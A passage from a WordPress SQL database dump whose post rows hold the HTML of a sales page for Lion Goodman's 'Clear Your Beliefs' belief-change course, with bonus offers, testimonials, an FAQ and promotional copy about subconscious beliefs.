neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:37:47', '2014-06-19 06:37:47', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1038, 2, '2014-06-19 01:33:11', '2014-06-19 06:33:11', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: 